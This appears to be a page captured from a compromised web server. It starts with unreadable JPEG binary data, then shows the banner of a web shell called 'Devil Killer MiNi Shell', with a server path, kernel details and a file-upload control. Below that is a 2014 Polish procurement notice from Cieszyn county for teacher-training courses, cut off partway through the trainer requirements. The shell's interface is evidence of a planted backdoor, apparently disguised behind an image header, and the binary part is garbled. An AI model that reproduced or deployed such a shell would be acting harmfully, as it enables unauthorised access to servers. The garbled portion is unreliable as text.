JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140319/93088-N-2014.html

<p class="kh_header"><b>Cieszyn: przeprowadzenie zajęć doskonalących w Projekcie pn: /Innowacyjny system wspomagania szkół w powiecie cieszyńskim/ - części 1 - 26</b><br>
<b>Numer ogłoszenia: 93088 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Cieszyński w imieniu którego występuje Zarząd Powiatu Cieszyńskiego , ul. Bobrecka 29, 43-400 Cieszyn, woj. śląskie, tel. 33 4777213, faks 33 4777133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeprowadzenie zajęć doskonalących w Projekcie pn: /Innowacyjny system wspomagania szkół w powiecie cieszyńskim/ - części 1 - 26.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie zajęć doskonalących w Projekcie pn: /Innowacyjny system wspomagania szkół w powiecie cieszyńskim/ - części 1 - 26, realizowanego przez Powiat Cieszyński dla osób, które zadeklarowały udział w projekcie współfinansowanego ze środków Unii Europejskiej w ramach /Europejskiego Funduszu Społecznego/, realizowanego z Działania 3.5 Kompleksowe wspomaganie rozwoju szkół Programu Operacyjnego Kapitał Ludzki.

2. Zajęcia doskonalące będą obejmować następującą tematykę:
1.  Neurodydaktyka, mnemotechniki,
2. Innowacyjne metody nauczania dostosowane do nauczania przedmiotów ścisłych, językowych, humanistycznych, przyrodniczych, zawodowych,
3.  Indywidualne wzorce myślenia, 
4.  Wypalenie zawodowe - jak zapobiegać, jak sobie radzić,
5.  Komunikacja interpersonalna w edukacji, 
6.  Doskonalenie kompetencji wychowawczych dostosowane do wieku uczniów, 
7.  TIK - Nowoczesne technologie w szkole, 
8.  Dzienniki elektroniczne oparte na systemie Wizja Net oraz Vulcan, 
9.  Ocenianie kształtujące, 
10. Prowadzenie dokumentacji szkolnej zgodnie z przepisami oświatowymi, 
11. Metoda dobrego startu Marty Bogdanowicz oraz metody wspierania rozwoju emocjonalnego w tym metoda medali w pracy przedszkolnej,
12. Tolerancja i stereotypy w szkole, 
13. Wiedza w praktyce, korelacja międzyprzedmiotowa.

3. Ze względu na charakter usługi całość zamówienia podzielono na 26 odrębnych części, dopuszczając możliwość ubiegania się o każdą z części zamówienia z osobna. Szczegółowy opis poszczególnych części przedmiotu zamówienia zawiera załącznik nr 8 do SIWZ dla każdej części zamówienia z osobna.

4. Przedmiotowe zajęcia doskonalące mają obejmować wiedzę teoretyczną i/lub praktyczną z zakresu danego tematu, powinny być prowadzone w formie warsztatowej, wykładu według ustaleń wykonawcy z Zamawiającym. 

5. Dostarczania Zamawiającemu celem zaakceptowania materiałów szkoleniowych oraz szczegółowego programu zajęć (w tym daty oraz godziny rozpoczęcia i zakończenia) realizowanych z danej części tematycznej zamówienia w terminie do 6 dni roboczych przed planowanym rozpoczęciem zajęć, w wersji elektronicznej, na adres e-mail: sore@powiat.cieszyn.pl 

6. Pozostałe wymagania, jakie musi spełniać Wykonawca celem zrealizowania przedmiotu umowy:

a. Zamawiający udostępni nieodpłatnie sale do prowadzenia zajęć w placówkach edukacyjnych Zajęcia mogą odbywać się od poniedziałku do niedzieli w terminie 
i godzinach ustalonych z Zamawiającym od dnia podpisania umowy do 30 czerwca 2014 roku. 

b. Wykonawca musi zapewnić niezbędne materiały dydaktyczne tj. papier, kartki, blok 
do flipcharta, pisaki itp. oraz sprzęt typu laptop, ekran itp.

c. Zamawiający na wniosek Wykonawcy może zapewnić nieodpłatnie do poprowadzenia zajęć rzutnik multimedialny z laptopem. 

d. Dokumentacja z zajęć, zaświadczenia i/lub certyfikaty, materiały szkoleniowe oraz sala dydaktyczna będą oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, POKL i nazwą projektu według uzgodnień między stronami i wzorów przekazanych przez Zamawiającego. 

7. Beneficjentem projektu jest Powiat Cieszyński, a Realizatorem bezpośrednim projektu jest Wydział Edukacji Starostwa Powiatowego. Zajęcia doskonalące będą się odbywać na rzecz placówek oświatowych (szkół lub przedszkoli), które uczestniczą w projekcie w roku szkolnym 2013/2014.

8. Głównym celem Projektu jest wdrożenie do dnia 31 lipca 2015 roku nowatorskiego systemu doskonalenia nauczycieli, który będzie odpowiadał na zdiagnozowane indywidualne potrzeby jednostek oświatowych z powiatu cieszyńskiego. 

9. Osoba prowadząca zajęcia z danej części zamówienia, o których mowa w pkt. 3 nie może być pracownikiem placówek edukacyjnych w których ma docelowo prowadzić zajęcia.

10. Wykonawca pełniący w okresie organizacji zajęć doskonalących jednocześnie funkcję Szkolnego Organizatora Rozwoju Edukacji na podstawie odrębnej umowy na rzecz placówek edukacyjnych spośród wymienionych w pkt 3, nie może przeprowadzać zajęć doskonalących w tych placówkach, gdzie pełni w/w funkcję. 

11. Zamawiający zastrzega, że łączna liczba godzin osoby wykonującej usługę, trenera/wykładowy wynikająca z wykonywania wszystkich zadań w ramach niniejszego projektu oraz w ramach innych projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki, jak również wykonywanych w ramach innych programów Narodowych Strategicznych Ram Odniesienia nie może przekroczyć 240 godzin zegarowych miesięcznie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 26.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować odpowiednio dla każdego zadania minimum 1 osobą posiadającą następujące wykształcenie i doświadczenie:
dla części 1 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. wiedza praktyczna z tematyki prowadzonych szkoleń oraz znajomość realiów funkcjonowania polskiej szkoły (min. 5 letnie doświadczenie w pracy w szkole, poradni psychologiczno-pedagogicznej, ośrodku kształcenia nauczycieli/ metodycznym, lub innym ośrodku/instytucji wspierającej pracę szkoły) 
d. przeprowadzili co najmniej 51 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 1, w tym co najmniej 20 godzin dla nauczycieli 
dla części 2: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. wiedza praktyczna z tematyki prowadzonych szkoleń oraz znajomość realiów funkcjonowania polskiej szkoły (min. 5 letnie doświadczenie w pracy w szkole, poradni psychologiczno-pedagogicznej, ośrodku kształcenia nauczycieli/ metodycznym, lub innym ośrodku/instytucji wspierającej pracę szkoły) 
d. przeprowadzili co najmniej 54 godziny szkoleniowe zajęć/warsztatów z tematyki zamówienia z części 2, w tym co najmniej 20 godzin dla nauczycieli 
dla części 3: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. wiedza praktyczna z tematyki prowadzonych szkoleń oraz znajomość realiów funkcjonowania polskiej szkoły (min. 5 letnie doświadczenie w pracy w szkole, poradni psychologiczno-pedagogicznej, ośrodku kształcenia nauczycieli/ metodycznym, lub innym ośrodku/instytucji wspierającej pracę szkoły) 
d. przeprowadzili co najmniej 48 godziny szkoleniowe zajęć/warsztatów z tematyki zamówienia z części 3, w tym co najmniej 20 godzin dla nauczycieli 
dla części 4: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. wiedza praktyczna z tematyki prowadzonych szkoleń oraz znajomość realiów funkcjonowania polskiej szkoły (min. 5 letnie doświadczenie w pracy w szkole, poradni psychologiczno-pedagogicznej, ośrodku kształcenia nauczycieli/ metodycznym, lub innym ośrodku/instytucji wspierającej pracę szkoły) 
d. przeprowadzili co najmniej 48 godziny szkoleniowe zajęć/warsztatów z tematyki zamówienia z części 4, w tym co najmniej 20 godzin dla nauczycieli 
dla części 5: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, metodyka (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d.  metodyk z min. 3 letnim doświadczeniem zawodowym
d. przeprowadzili co najmniej 9 godzin szkoleniowych zajęć/warsztatów z nowej podstawy programowej z przedmiotów ścisłych
dla części 6: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
e. metodyk z min. 3 letnim doświadczeniem zawodowym 
d. przeprowadzili co najmniej 9 godzin szkoleniowych zajęć/warsztatów z tematyki z nowej podstawy programowej z przedmiotów humanistycznych
dla części 7: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. metodyk z min. 3 letnim doświadczeniem zawodowym 
e. przeprowadzili co najmniej 6 godzin szkoleniowych zajęć/warsztatów z tematyki z nowej podstawy programowej z przedmiotów gastronomicznych
dla części 8: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, metodyka (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych
d.  metodyk z min. 3 letnim doświadczeniem zawodowym
e. przeprowadzili co najmniej 6 godzin szkoleniowych zajęć/warsztatów z tematyki z zakresu szkoleń z nowej podstawy programowej z przedmiotów hotelarskich
dla części 9: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. metodyk z min. 3 letnim doświadczeniem zawodowym 
e. przeprowadzili co najmniej 9 godzin szkoleniowych zajęć/warsztatów z zakresu szkoleń z nowej podstawy programowej z przedmiotów przyrodniczych
dla części 10: 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. metodyk z min. 3 letnim doświadczeniem zawodowym 
e. przeprowadzili co najmniej 3 godziny szkoleniowe zajęć/warsztatów z tematyki z zakresu szkoleń z nowej podstawy programowej z przedmiotów językowych
dla części 11  
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. metodyk z min. 3 letnim doświadczeniem zawodowym
d. przeprowadzili co najmniej 3 godziny szkoleniowe zajęć/warsztatów z nowej podstawy programowej z przedmiotów zawodowych informatycznych 
dla części 12 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c.  co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. przeprowadzili co najmniej 12 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 12
dla części 13 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 letnie z osobami nauczycielami 
d. przeprowadzili co najmniej 33 godziny szkoleniowe zajęć/warsztatów z tematyki zamówienia z części 13
dla części 14 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych
d. przeprowadzili co najmniej 56 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 14
dla części 15
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych
d. przeprowadzili co najmniej 60 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 15
dla części 16 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych
d. przeprowadzili co najmniej 60 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 16
e. podsiadają min. roczne doświadczenie w pracy w szkole (znajomość środowiska szkoły) 
dla części 17 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 letnie z nauczycielami 
d. przeprowadzili co najmniej 36 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 17
e. podsiadają min. roczne doświadczenie w pracy w szkole (znajomość środowiska szkoły) 
dla części 18
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 36 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 18
e. podsiadają min. roczne doświadczenie w pracy w szkole (znajomość środowiska szkoły) 
dla części 19 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. przeprowadzili co najmniej 24 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 19
dla części 20 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. przeprowadzili co najmniej 48 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 20
dla części 21 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych 
d. przeprowadzili co najmniej 24 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 21
dla części 22
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 24 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 22
dla części 23
a. wykształcenie wyższe II stopnia magisterskie kierunkowe 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 3 godziny szkoleniowe zajęć/warsztatów z tematyki zamówienia z części 23
dla części 24 
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi: ukończone kursy lub studia przygotowujące do pracy pedagoga, psychologa, trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 36 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 24
dla części 25
a. wykształcenie wyższe II stopnia magisterskie, 
b. posiadają przygotowanie do prowadzenia szkoleń i/lub pracy z osobami dorosłymi w zakresie edukacji antydyskryminacyjnej: ukończone kursy lub studia przygotowujące do pracy trenera, edukatora, moderatora, coacha, (dyplomy ukończenia studiów, certyfikat trenerski, edukatorski, dyplomy ukończenia kursów, studiów podyplomowych) 
c. co najmniej 5-letnie doświadczenie w pracy z grupą osób dorosłych w tym min. 2 -letnie z nauczycielami 
d. przeprowadzili co najmniej 12 godzin szkoleniowych zajęć/warsztatów z tematyki zamówienia z części 25
dla części 26
a. wykształcenie wyższe II stopnia magisterskie, 
